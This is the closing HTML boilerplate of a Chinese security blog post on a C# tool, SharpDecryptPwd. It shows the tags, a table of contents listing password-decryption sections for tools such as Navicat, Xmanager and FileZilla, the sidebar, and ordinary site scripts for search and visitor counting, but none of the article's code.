    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.jpg" alt="RcoIl WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>嘤嘤怪：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://rcoil.me/2019/09/【编程】SharpDecryptPwd/" title="【编程】SharpDecryptPwd">https://rcoil.me/2019/09/【编程】SharpDecryptPwd/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/内网渗透/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 内网渗透</a>
          
            <a href="/tags/C/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> C#</a>
          
            <a href="/tags/Tools/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> Tools</a>
          
            <a href="/tags/编程之道/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 编程之道</a>
          
            <a href="/tags/Decrypt/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> Decrypt</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/【知识回顾】深入了解 PsExec/" rel="next" title="【知识回顾】深入了解 PsExec">
                <i class="fa fa-chevron-left"></i> 【知识回顾】深入了解 PsExec
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/【知识回顾】进程注入-第一部分/" rel="prev" title="【知识回顾】进程注入-第一部分">
                【知识回顾】进程注入-第一部分 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="RcoIl">
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">39</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">18</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        
		
		
          <div class="feed-link motion-element">
            <div id="days"></div>
			<script language="javascript">
			function show_date_time(){
				window.setTimeout("show_date_time()", 1000);
				BirthDay=new Date("09/01/2016 10:13:14");
				today=new Date();
				timeold=(today.getTime()-BirthDay.getTime());
				sectimeold=timeold/1000
				secondsold=Math.floor(sectimeold);
				msPerDay=24*60*60*1000
				e_daysold=timeold/msPerDay
				daysold=Math.floor(e_daysold);
				e_hrsold=(e_daysold-daysold)*24;
				hrsold=setzero(Math.floor(e_hrsold));
				e_minsold=(e_hrsold-hrsold)*60;
				minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
				seconds=setzero(Math.floor((e_minsold-minsold)*60));
				document.getElementById('days').innerHTML="本站已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分"+ seconds +" 秒";
			}
			function setzero(i){
				if (i<10)
				{i="0" + i};
				return i;
			}		
			show_date_time();
		</script>
        </div>
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://rootrain.me/" title="rootrain" target="_blank">rootrain</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.luolikong.vip/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://cate4cafe.com/" title="cate4cafe" target="_blank">cate4cafe</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://52stu.me/" title="IversOn5" target="_blank">IversOn5</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hone.cool/" title="Hone" target="_blank">Hone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://sharecast.bitcron.com/" title="sharecast" target="_blank">sharecast</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://scarletf.github.io/" title="ScarletF" target="_blank">ScarletF</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.lz1y.cn/" title="Lz1y" target="_blank">Lz1y</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-Navicat-PremiumSoft"><span class="nav-text">0x01 Navicat PremiumSoft</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-如何加密"><span class="nav-text">1.1 如何加密</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-加密过程（C-）"><span class="nav-text">1.2 加密过程（C#）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-解密过程"><span class="nav-text">1.3 解密过程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-SSMS"><span class="nav-text">0x02 SSMS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-Xmanager"><span class="nav-text">0x03 Xmanager</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-如何加密"><span class="nav-text">3.1 如何加密</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-加密过程（C-）"><span class="nav-text">3.2 加密过程（C#）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-3-解密过程（C-）"><span class="nav-text">3.3 解密过程（C#）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-TeamView"><span class="nav-text">0x04 TeamView</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-FileZilla"><span class="nav-text">0x05 FileZilla</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-Foxmail"><span class="nav-text">0x06 Foxmail</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#来源参考"><span class="nav-text">来源参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
